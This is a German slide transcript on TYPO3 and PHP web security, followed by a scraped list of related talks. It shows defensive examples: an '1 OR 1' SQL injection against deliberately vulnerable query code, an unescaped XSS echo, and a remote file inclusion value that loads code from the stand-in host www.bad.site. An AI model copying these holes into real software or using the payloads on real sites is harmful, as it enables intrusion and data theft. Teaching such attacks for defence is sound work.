Typo3 - Schutz und Sicherheit

Größe: px
Ab Seite anzeigen:

Download "Typo3 - Schutz und Sicherheit - 07.11.07"

Transkript

1 Typo3 - Schutz und Sicherheit

2 Angriffe auf Web-Anwendungen wie CMS oder Shop- Systeme durch zum Beispiel SQL Injection haben sich in den letzten Monaten zu einem Kernthema im Bereich IT- Sicherheit entwickelt. Herkömmliche IT-Sicherheitslösungen wie Firewalls oder IDS/IPS bieten keinen ausreichenden Schutz gegen derartige Angriffe. Das Web, speziell das HTTP-Protokoll, wurde nicht konzipiert für komplexe Anwendungen, die heute aber im e-business aus wirtschaftlichen Gründen eine Notwendigkeit geworden sind. 2

3 Typo3-User schätzen die Bandbreite des Web-Content- Management-Systems mit seinen vielen Erweiterungen. Entwickler sollten dabei jedoch beachten: Je sensibler die Daten, die die Web-Anwendung transportiert, desto lukrativer werden auch Angriffe, um diese Daten auszuspionieren. Hier eine Übersicht der gängigsten Angriffsmöglichkeiten: Eine SQL-Injection-Attacke sieht auf den ersten Blick aus wie eine harmlose Anfrage. Wenn jedoch ein Angreifer im Eingabefeld Name statt des Nachnamens einen SQL-Befehl eintippt und dieser Befehl akzeptiert wird, kann er auf diesem Wege ohne Berechtigung sensible Informationen aus der Datenbank anfordern. Böswillige Requests in großer Menge können sogar ganze Web-Anwendungen lahmlegen. 3

4 SQL injections ermöglicht Hackern unsichere SQL Abfragen zu modifieren, um Daten zu verändern oder sensible Daten a u s z u s p ä h e n. D i e s g e s c h i e h t d u r c h u n v a l i d i e r t e Usereingaben. Ein Hacker könnte einen String übergeben, wie zb.: 1 OR 1, : $value = $_GET['value']; $GLOBALS['TYPO3_DB']->exec_SELECTquery('*', $this->user_table, 'uid='.$value ); die Abfrage endet dann so: $GLOBALS['TYPO3_DB']->exec_SELECTquery('*', $this->user_table, 'uid=1 OR 1 ); Dies liefert als Ergebnis alle rows von $this- >user_table. Dagegen schützt nur die Validierung aller Eingaben, die bei der SQL Abfrage genutzt werden. 4

5 SQL-Injection gehört mit zu den verbreitesten Angriffen und zielen oft auf Community Seiten, da Zweck der Attacke Datensammeln ist. Schützen tut hier nur eine Saubere Programmierung. Unter Session Riding versteht man die unberechtigte Übernahme einer HTTP-Session. Kommandos werden in e i n e b e s t e h e n d e S e s s i o n e i n e s B e n u t z e r s eingeschmuggelt. Diese Kommandos werden dann mit den Rechten des angegriffenen Benutzers ausgeführt. Bei Session Hijacking übernimmt der Angreifer die gesamte Session des Benutzers und kann somit mit den Rechten des Benutzers arbeiten. Beide Session Attacken werden vornehmlich bei Shops, Partnerportalen oder auch ebay verwendet. 5

6 Mit Cross Site Scripting (XSS) wird versucht, den rowser dazu zu bringen, bestimmte Aktionen im Namen es legitimen Benutzers durchzuführen. Besondere orsicht ist mit Ausgaben mittels echo von nvalidierten Eingaben angebracht. Code wie dieser kann für Ihre Besucher gefährlich sein: cho $_REQUEST['value']; eliebte Ziele für XSS sind Foren- und Portalsysteme owie Web 2.0 Web Anwendungen. value = htmlspecialchars( $value ); 6

7 Stellen Sie sich vor Sie haben folgende Zeile in Ihrer Typo3 Erweiterung: include( $absolute_path. '/typo3/ yourextension.class.php' ); außerdem das der Hacker folgendes versucht: absolute_path=http://www.bad.site/bad.gif? und damit ausführbaren Code mit einer als Bild benannten Datei sendet. 7

8 Der Code wird dann mit der Berechtigung des Webservers ausgeführt. (Vorrausgesetzt das register_globals ist auf ON, was leider oft der Fall ist). Das nennt man remote file inclusion. Dies können sogar sogenannte script kiddies, e r f a h r e n d e H a c k e r k ö n n e n d i e s a u c h b e i register_globals OFF abhängig aber von bestimmten PHP Versionen. Remote file inclusion ist nur dann möglich wenn die PHP Einstellung allow_url_fopen auf ON steht. Seien Sie also sehr Vorsichtig mit allen Funktionen, die das Dateisystem betreffen zb. include, require, include_once, require_once, fopen. 8

9 Gute Praxis ist es constanten zu nutzen: define( 'YOURBASEPATH', dirname( FILE ) ); require_once( YOURBASEPATH. '/file_to_include.php' ); Da hier keine Variablen genutzt werden, hat der Hacker kein Chance Dateien von einem Remote Server zu öffnen. 9

10 Stellen Sie sicher das Ihre Erweiterung kein register_globals ON braucht. Es gibt leider immer noch genug Programme die register_globals ON brauchen. PHP importiert dann alle $_GET, $_POST, $_COOKIE Daten und einige andere Variablen in einen Globalen Bereich. Wenn das Programm gut geschrieben ist, ist daran nichts auszusetzen, aber es gibt leider genug Programme in dem die Variablen unsicher gehandhabt werden und somit ernste Löcher ins System reißen, darum sollte man sein Webhosting auf RG OFF schalten (sofern möglich), viele Hoster gehen langsam dazu über die Server per default auf OFF zu setzten. 10

11 Sonstiges was zu beachten ist * Nutze nicht eval(). eval() is evil! * Nutze keine Shellbefehle, exec, shell_exec, system, popen und ähnliche * Nutzen Sie etc, in Ihrem Code 11

12 Das Typo3 INstall Tool sollte als Elementare Regel nicht vom Web erreichbar sein, nur dann wenn man es braucht. Deaktiviere das Install Tool durch auskommentieren der ersten Zeile..die() in typo3/install/index.php oder verschiebe das Verzeichnis typo3/install oder mache es für den Webserver unerreichbar. Ändere das Password des admin Users sofort und am besten ersetze den admin user durch einen neuen. Nutze das Quickstart- und Testsite Paket nur local zum testen für Live Sites ist das dummy Paket besser geeignet. 12

13 Lösche jedes Schreibrecht für typo3_src (chmod für die Dateien 444) Nutze die Sicherheits Optionen im Install Tool: [strictformmail] sollte 1 sein [encryptionkey] sollte gesetzt sein [warning_ _addr] [lockip] [lockrootpath] [filecreatemask] [filedenypattern] sollte zumindest \.php$ \.php.$ enthalten [foldercreatemask] 13

14 [warning_mode] [IPmaskList] [lockbeusertodbmounts] [lockssl] [enabledbeuseriplock] [disable_exec_fucntion] [usephpfilefunctions] [nophpscriptinclude] sollte bedacht werden wenn andere Zugriff auf Template Dateien haben [lockhashkeywords] [devipmask] 14

15 Vermeide config.baseurl = 1 sicherer ist es absolute URLs zu nutzen. Nutze für das BE SSL (dann die lockssl option aktivieren) Für FE User sollte man für Logon, Registration und Passwordänderung auch SSL nutzen. Passwörter nicht in Klartext speichern hier kann man die Erweiterung kb_md5fepw nutzen oder LDAP. Erlaube kein Content Element HTML. Erlaube kein reines Html in Text Content Elements Erlaube keine Erweiterungen, die eine Eingabe von PHP Code erlauben. 15

16 Useraccounts sollten richtige Namen haben kein predator sondern Marko Schmuck, somit kann man schneller Ereignisse überblicken. Nutze nur geteste Erweiterungen. 16

17 PHP Optionen: Logge Errors in eine Datei - Display Errors sollte off sein, damit keine sensiblen Serverdaten durch einen Fehler angezweigt werden. Nutze wenns geht safemode oder zumindest basedir. Nutze CGI/PHP (suphp) somit ist der Webuser = dem FTP User. Register Globals = OFF!!!!!!! allow_url_fopen = OFF!!!!!!! Wenn man Dateien von außerhalb braucht (RSS Feeds) sollte man auf curl zurückgreifen. 17

Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben

Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben Heinlein Support GmbH Peer Heinlein Selbstschutz Wo sind meine Risiken? Haben wir Geheimnisse?.htaccess und.htpasswd

Mehr

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript

Mehr

web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Montag, 14. Mai 12

web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Montag, 14. Mai 12 Hochschule Niederrhein University of Applied Sciences Elektrotechnik und Informatik Faculty of Electrical Engineering and Computer Science web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Inhalt

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Web Hacking - Angriffe und Abwehr

Web Hacking - Angriffe und Abwehr Web Hacking - Angriffe und Abwehr UNIX-Stammtisch 31. Januar 2012 Frank Richter Holger Trapp Technische Universität Chemnitz Universitätsrechenzentrum Motivation (1): Für uns Lehrveranstaltung: Techniken

Mehr

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

XSS for fun and profit

XSS for fun and profit 5. Chemnitzer Linux-Tag 1.-2.- März 2003 XSS for fun and profit Theorie und Praxis von Cross Site Scripting (XSS) Sicherheitslücken, Diebstahl von Cookies, Ausführen von Scripten auf fremden Webservern,

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink Hacker-Methoden in der IT- Sicherheitsausbildung Dr. Martin Mink Hacker-Angriffe 3.11.2010 Hacker-Methoden in der IT-Sicherheitsausbildung Dr. Martin Mink 2 Typische Angriffe auf Web- Anwendungen SQL Injection

Mehr

Sicherheit von Webapplikationen Sichere Web-Anwendungen

Sicherheit von Webapplikationen Sichere Web-Anwendungen Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt

Mehr

Schwachstellenanalyse 2013

Schwachstellenanalyse 2013 Schwachstellenanalyse 2013 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 09.01.2014 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten

Mehr

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST 2. Interaktive Web Seiten GET und POST Die Übertragungsmethoden GET und POST sind im http Protokoll definiert: POST: gibt an, dass sich weitere Daten im Körper der übertragenen Nachricht befinden: z.b.

Mehr

Web Applications Vulnerabilities

Web Applications Vulnerabilities Bull AG Wien Web Applications Vulnerabilities Philipp Schaumann Dipl. Physiker Bull AG, Wien www.bull.at/security Die Problematik Folie 2 Der Webserver ist das Tor zum Internet auch ein Firewall schützt

Mehr

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH 2 Open for Business - Open to Attack? 75% aller Angriffe zielen auf Webanwendungen (Gartner, ISS)

Mehr

PHP-Security. Aleksander Paravac. watz@lug-bamberg.de http://www.lug-bamberg.de. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27

PHP-Security. Aleksander Paravac. watz@lug-bamberg.de http://www.lug-bamberg.de. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27 PHP-Security Aleksander Paravac watz@lug-bamberg.de http://www.lug-bamberg.de Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27 Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver

Mehr

PHP mit Dreamweaver MX bearbeiten 00

PHP mit Dreamweaver MX bearbeiten 00 teil03.fm Seite 360 Donnerstag, 5. Februar 2004 6:27 18 PHP mit Dreamweaver MX bearbeiten 00 Mit Dreamweaver MX 2004 und PHP effektiv arbeiten PHP kann ausschließlich grafisch im Layoutmodus programmiert

Mehr

Netzwerksicherheit Übung 9 Websicherheit

Netzwerksicherheit Übung 9 Websicherheit Netzwerksicherheit Übung 9 Websicherheit David Eckhoff, Tobias Limmer, Christoph Sommer Computer Networks and Communication Systems Dept. of Computer Science, University of Erlangen-Nuremberg, Germany

Mehr

verstehen lernen, wie der Angreifer denkt diese Methoden selbst anwenden Allerdings: Mitdenken, nicht nur blindes ausprobieren Außerdem:

verstehen lernen, wie der Angreifer denkt diese Methoden selbst anwenden Allerdings: Mitdenken, nicht nur blindes ausprobieren Außerdem: !! "!!##$ %& es gibt keine 100 %ige Sicherheit Fehler zu machen ist menschlich man muss es so gut wie möglich machen es ist GROB FAHRLÄSSIG es nicht einmal zu versuchen Ziel: Methoden entwickeln, die Sicherheit

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

SZENARIO. ausgeführt Command Injection: Einschleusen (Injizieren) bösartiger Befehle zur Kompromittierung der Funktionsschicht

SZENARIO. ausgeführt Command Injection: Einschleusen (Injizieren) bösartiger Befehle zur Kompromittierung der Funktionsschicht SZENARIO Folgenden grundlegende Gefahren ist ein Webauftritt ständig ausgesetzt: SQL Injection: fremde SQL Statements werden in die Opferapplikation eingeschleust und von dieser ausgeführt Command Injection:

Mehr

Welche Gefahren gehen vom Firmenauftritt im Internet aus?

Welche Gefahren gehen vom Firmenauftritt im Internet aus? Die Webseite als Eintrittspunkt Welche Gefahren gehen vom Firmenauftritt im Internet aus? Bekannt gewordene Schwachstellen & Angriffe Bekannt gewordene Schwachstellen & Angriffe Quelle: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/

Mehr

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de Advanced Web Hacking Matthias Luft Security Research mluft@ernw.de ERNW GmbH. Breslauer Str. 28. D-69124 Heidelberg. www.ernw.de 6/23/2010 1 ERNW GmbH Sicherheitsdienstleister im Beratungs- und Prüfungsumfeld

Mehr

Sicherheit in Webanwendungen CrossSite, Session und SQL

Sicherheit in Webanwendungen CrossSite, Session und SQL Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery

Mehr

FAQ - Script gaesteform

FAQ - Script gaesteform FAQ - Script gaesteform www.kundencenter.ws 9. April 2009 Salvatore Spadaro 1 2 Inhaltsverzeichnis 1 Script - gaesteform 3 1.1 Welchen Funktionumfang bietet das Script gaesteform und welche Technik steckt

Mehr

Typo 3 installieren. Schritt 1: Download von Typo3

Typo 3 installieren. Schritt 1: Download von Typo3 Typo 3 installieren Bevor Sie Typo3 installieren, müssen Sie folgende Informationen beachten: Typo3 benötigt eine leere Datenbank. Mit Ihrem Abonnement verfügen Sie über eine einzige Datenbank. Sie können

Mehr

V10 I, Teil 2: Web Application Security

V10 I, Teil 2: Web Application Security IT-Risk-Management V10 I, Teil : Web Application Security Tim Wambach, Universität Koblenz-Landau Koblenz, 9.7.015 Agenda Einleitung HTTP OWASP Security Testing Beispiele für WebApp-Verwundbarkeiten Command

Mehr

Audit von Authentifizierungsverfahren

Audit von Authentifizierungsverfahren Audit von Authentifizierungsverfahren Walter Sprenger, Compass Security AG Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel +41 55-214 41 60 Fax +41 55-214 41 61 team@csnc.ch

Mehr

Open Catalog Interface (OCI) Anbindung an VirtueMart

Open Catalog Interface (OCI) Anbindung an VirtueMart Ver. 2.5.1 Open Catalog Interface (OCI) Anbindung an VirtueMart Joomla 2.5 und Virtuemart 2.0.6 Ing. Karl Hirzberger www.hirzberger.at Inhaltsverzeichnis Begriffserklärung... 3 OCI für VirtueMart... 4

Mehr

Apache HTTP-Server Teil 2

Apache HTTP-Server Teil 2 Apache HTTP-Server Teil 2 Zinching Dang 04. Juli 2014 1 Benutzer-Authentifizierung Benutzer-Authentifizierung ermöglicht es, den Zugriff auf die Webseite zu schützen Authentifizierung mit Benutzer und

Mehr

Webapplikationen wirklich sicher?! 10. Mai 2006 IT-TRENDS Sicherheit Zentrum für IT-Sicherheit, Bochum

Webapplikationen wirklich sicher?! 10. Mai 2006 IT-TRENDS Sicherheit Zentrum für IT-Sicherheit, Bochum Webapplikationen wirklich sicher? 10. Mai 2006 IT-TRENDS Sicherheit Zentrum für IT-Sicherheit, Bochum Die wachsende Bedrohung durch Web-Angriffen Test, durchgeführt von PSINet und Pansec 2 "dummy" Web-Sites

Mehr

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus?

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Joomla!-Sicherheit. von Joomla-Security.de. Jan Erik Zassenhaus & Christian Schmidt. www.joomla-security.de. Seite 1

Joomla!-Sicherheit. von Joomla-Security.de. Jan Erik Zassenhaus & Christian Schmidt. www.joomla-security.de. Seite 1 Joomla!-Sicherheit von Joomla-Security.de Jan Erik Zassenhaus & Christian Schmidt Seite 1 Wollen Sie sowas? Seite 2 PC Passwörter Allgemeines Anti-Viren-Software Firewall Updates des Systems und von der

Mehr

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist?

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? Pallas Security Colloquium Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? 18.10.2011 Referent: Tim Kretschmann Senior System Engineer, CISO Pallas GmbH Hermülheimer Straße 8a

Mehr

Sicherheitsaspekte von PHP und deren Umsetzung in TYPO3. Alexander Weidinger FH STP, IT Security

Sicherheitsaspekte von PHP und deren Umsetzung in TYPO3. Alexander Weidinger FH STP, IT Security Sicherheitsaspekte von PHP und deren Umsetzung in TYPO3 Alexander Weidinger FH STP, IT Security Gliederung PHP potentielle Sicherheitslücken & Schutz Typo3 Werkzeuge für Extension-Entwicklung Zielgruppe

Mehr

[2-4] Typo3 unter XAMPP installieren

[2-4] Typo3 unter XAMPP installieren Web >> Webentwicklung und Webadministration [2-4] Typo3 unter XAMPP installieren Autor: simonet100 Inhalt: Um Typo3 zum Laufen zu bringen benötigen wir eine komplette Webserverumgebung mit Datenbank und

Mehr

Cross Site Scripting (XSS)

Cross Site Scripting (XSS) Konstruktion sicherer Anwendungssoftware Cross Site Scripting (XSS) Stephan Uhlmann 31.08.2003 Copyright (c) 2003 Stephan Uhlmann Permission is granted to copy, distribute and/or modify this

Mehr

Frage: Ich möchte meinen Microsoft Windows Server gegen Hacker absichern, was kann ich sinnvolles tun?

Frage: Ich möchte meinen Microsoft Windows Server gegen Hacker absichern, was kann ich sinnvolles tun? Windows Server absichern Frage: Ich möchte meinen Microsoft Windows Server gegen Hacker absichern, was kann ich sinnvolles tun? Antwort: 1. Abschalten / Deinstallation unbenötiger Dienste Gerade Plesk

Mehr

Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen

Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen Ralf Reinhardt 28.11.2013, 16:40 Uhr Roadshow Sicheres Internet aiti-park Werner-von-Siemens-Str. 6 86159 Augsburg 1 Hacker-Tool Browser Über

Mehr

ESA SECURITY MANAGER. Whitepaper zur Dokumentation der Funktionsweise

ESA SECURITY MANAGER. Whitepaper zur Dokumentation der Funktionsweise ESA SECURITY MANAGER Whitepaper zur Dokumentation der Funktionsweise INHALTSVERZEICHNIS 1 Einführung... 3 1.1 Motivation für den ESA Security Manager... 3 1.2 Voraussetzungen... 3 1.3 Zielgruppe... 3 2

Mehr

Money for Nothing... and Bits4free

Money for Nothing... and Bits4free Money for Nothing... and Bits4free 8.8.2011 Gilbert Wondracek, gilbert@iseclab.org Hacker & Co Begriff hat je nach Kontext andere Bedeutung, Ursprung: 50er Jahre, MIT Ausnutzen von Funktionalität die vom

Mehr

Installationsanleitung Webhost Linux Flex

Installationsanleitung Webhost Linux Flex Installationsanleitung Webhost Linux Flex Stand März 2014 Inhaltsverzeichnis 1. Zugangsdaten & Login... 3 2. Passwort ändern... 4 3. Leistungen hinzufügen / entfernen... 6 4. Datenbanken anlegen / entfernen...

Mehr

Session Management und Cookies

Session Management und Cookies LMU - LFE Medieninformatik Blockvorlesung Web-Technologien Wintersemester 2005/2006 Session Management und Cookies Max Tafelmayer 1 Motivation HTTP ist ein zustandsloses Protokoll Je Seitenaufruf muss

Mehr

PHP-Schwachstellen und deren Ausnutzung

PHP-Schwachstellen und deren Ausnutzung PHP-Schwachstellen und deren Ausnutzung 44. DFN Betriebstagung / 7. Februar 2006 DFN-CERT Services GmbH Jan Kohlrausch / CSIRT Gliederung Grundlagen HTTP und PHP Anatomie typischer Schwachstellen in PHP-Skripten

Mehr

Benutzerhandbuch. Bürgel ConsumerCheck für OXID eshop

Benutzerhandbuch. Bürgel ConsumerCheck für OXID eshop Bürgel ConsumerCheck für OXID eshop Benutzerhandbuch 2014 derksen mediaopt GmbH. Alle Rechte vorbehalten. Es wurden alle Anstrengungen unternommen, um sicherzustellen, dass die in diesem Benutzerhandbuch

Mehr

Fortgeschrittene Servlet- Techniken. Ralf Gitzel ralf_gitzel@hotmail.de

Fortgeschrittene Servlet- Techniken. Ralf Gitzel ralf_gitzel@hotmail.de Fortgeschrittene Servlet- Techniken Ralf Gitzel ralf_gitzel@hotmail.de 1 Themenübersicht Ralf Gitzel ralf_gitzel@hotmail.de 2 Übersicht Servlet Initialisierung Attribute und Gültigkeitsbereiche Sessions

Mehr

Markus Dopler Rainer Ruprechtsberger. Security und Trust Aspekte in Service-Orientierten Web-Applikationen

Markus Dopler Rainer Ruprechtsberger. Security und Trust Aspekte in Service-Orientierten Web-Applikationen Markus Dopler Rainer Ruprechtsberger Security und Trust Aspekte in Service-Orientierten Web-Applikationen SOSE: Vision Automatische Auswahl und Integration von angebotenen Services Inhalt Beispiel SOA

Mehr

vii Inhaltsverzeichnis 1 Einleitung 1

vii Inhaltsverzeichnis 1 Einleitung 1 vii 1 Einleitung 1 1.1 Über dieses Buch................................. 1 1.2 Was ist Sicherheit?............................... 3 1.3 Wichtige Begriffe................................ 4 1.4 Sicherheitskonzepte..............................

Mehr

1 Funktionsumfang. 1.1 Vorteile auf einen Blick

1 Funktionsumfang. 1.1 Vorteile auf einen Blick VöB ZVD directpos OXID Zahlungsmodul Modul Version: 1.1. Shopversion: OXID 4.5.x 4.7.x/5.0.x Inhaltsverzeichnis 1 Funktionsumfang... 2 1.1 Vorteile auf einen Blick... 2 2 Installation und Konfiguration...

Mehr

Abbildung der Gefährdungen der WASC und OWASP auf die Gefährdungen und Maßnahmenempfehlungen des IT-Grundschutz-Bausteins B 5.

Abbildung der Gefährdungen der WASC und OWASP auf die Gefährdungen und Maßnahmenempfehlungen des IT-Grundschutz-Bausteins B 5. Abbildung der Gefährdungen der WASC und OWASP auf die Gefährdungen und Maßnahmenempfehlungen des IT-Grundschutz-Bausteins B 5.21 Die Zusammenstellung der Gefährdungen für den Baustein 5.21 bediente sich

Mehr

Installation von Typo3 CMS

Installation von Typo3 CMS Installation von Typo3 CMS TYPO3 Version 6.2.x unter Windows Eigenen lokalen Webserver mit XAMPP installieren Für die Installation von Typo3 wird eine passende Systemumgebung benötig. Diese besteht aus

Mehr

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 The OWASP Foundation http://www.owasp.org Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 Tobias Glemser tobias.glemser@owasp.org tglemser@tele-consulting.com Ralf Reinhardt

Mehr

Grundlagen Sicherheit der Web- Programmierung mit dem Schwerpunkt PHP

Grundlagen Sicherheit der Web- Programmierung mit dem Schwerpunkt PHP Grundlagen Sicherheit der Web- Programmierung mit dem Schwerpunkt PHP Version 0.1, Stand 02.01.2010 Für das Modul Internet-Programmierung der Beuth Hochschule für Technik Berlin im Online-Studiengang Medieninformatik

Mehr

So ziehen Sie Ihr Wordpress Blog zu STRATO um

So ziehen Sie Ihr Wordpress Blog zu STRATO um So ziehen Sie Ihr Wordpress Blog zu STRATO um Version 1.0 So ziehen Sie Ihr Wordpress Blog zu STRATO um Das Wordpress-Plugin Duplicator ermöglicht Ihnen, in wenigen Schritten Ihre Wordpress-Instanz umzuziehen.

Mehr

Upgrade auf TYPO3 6.2

Upgrade auf TYPO3 6.2 Upgrade auf TYPO3 6.2 Jochen Weiland Wolfgang Wagner TYPO3camp Berlin 2014! Fakten Kunden lieben LTS Versionen Die meisten Projekte laufen mit 4.5 Fakten 3.5 Jahre seit dem Release 4.5 34 Release seitdem

Mehr

Installation/Update und Konfiguration des Renderservice (v1.7.0)

Installation/Update und Konfiguration des Renderservice (v1.7.0) Installation/Update und Konfiguration des Renderservice (v1.7.0) [edu- sharing Team] [Dieses Dokument beschreibt die Installation und Konfiguration des Renderservice.] edu- sharing / metaventis GmbH Postfach

Mehr

Übung 4: Schreiben eines Shell-Skripts

Übung 4: Schreiben eines Shell-Skripts Aufgabenteil 1 Ziel der Übung Übung 4: Schreiben eines Shell-Skripts Anhand eines einfachen Linux-Skripts sollen die Grundlagen der Shell-Programmierung vermittelt werden. Das für die Bash-Shell zu erstellende

Mehr

Wie steht es um die Sicherheit in Software?

Wie steht es um die Sicherheit in Software? Wie steht es um die Sicherheit in Software? Einführung Sicherheit in heutigen Softwareprodukten Typische Fehler in Software Übersicht OWASP Top 10 Kategorien Praktischer Teil Hacking Demo Einblick in die

Mehr

Hacking. InfoPoint 07.12.2005. Jörg Wüthrich

Hacking. InfoPoint 07.12.2005. Jörg Wüthrich Hacking InfoPoint 07.12.2005 Jörg Wüthrich Inhalte Rund um das Thema Hacking Angriffs-Techniken Session Handling Cross Site Scripting (XSS) SQL-Injection Buffer Overflow 07.12.2005 Infopoint - Hacking

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

PHP sicher, performant und skalierbar betreiben

PHP sicher, performant und skalierbar betreiben PHP sicher, performant und skalierbar betreiben Dipl.-Inform. Dominik Vallendor 26.09.2012 Tralios IT GmbH www.tralios.de Über mich Dominik Vallendor Studium der Informatik in Karlsruhe Seit 1995: Internet

Mehr

FTP Tutorial. Das File Transfer Protocol dient dem Webmaster dazu eigene Dateien wie z.b. die geschriebene Webseite auf den Webserver zu laden.

FTP Tutorial. Das File Transfer Protocol dient dem Webmaster dazu eigene Dateien wie z.b. die geschriebene Webseite auf den Webserver zu laden. FTP Tutorial Das File Transfer Protocol dient dem Webmaster dazu eigene Dateien wie z.b. die geschriebene Webseite auf den Webserver zu laden. Um eine solche Verbindung aufzubauen werden einerseits die

Mehr

Installation von Wordpress

Installation von Wordpress Installation von Wordpress Wordpress (http://wordpress-deutschland.org/) ist ein sehr bekanntes Blog-Script, welches Ihnen ermöglicht, schnell und einfach ein Blog auf Ihrem Webspace zu installieren. Sie

Mehr

ZSDGMDZFGW... Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden. Ben Fuhrmannek #phpug-köln 2.10.2009

ZSDGMDZFGW... Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden. Ben Fuhrmannek #phpug-köln 2.10.2009 ZSDGMDZFGW Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden Ben Fuhrmannek #phpug-köln 2.10.2009 Über mich Informatiker Entwickler IT Security 2 TOC Aufbau ZF Problem 1 bis 10 3

Mehr

secunet Security Networks AG Sicherheit in Web-Portalen Hamburg, 22.11.2010 Dipl. Inform. Dirk Reimers

secunet Security Networks AG Sicherheit in Web-Portalen Hamburg, 22.11.2010 Dipl. Inform. Dirk Reimers secunet Security Networks AG Sicherheit in Web-Portalen Hamburg, 22.11.2010 Dipl. Inform. Dirk Reimers Vorstellung Dirk Reimers - DFN-CERT (bis 1998) - secunet seit 1999 - Principal Informations-Sicherheitsmanagement,

Mehr

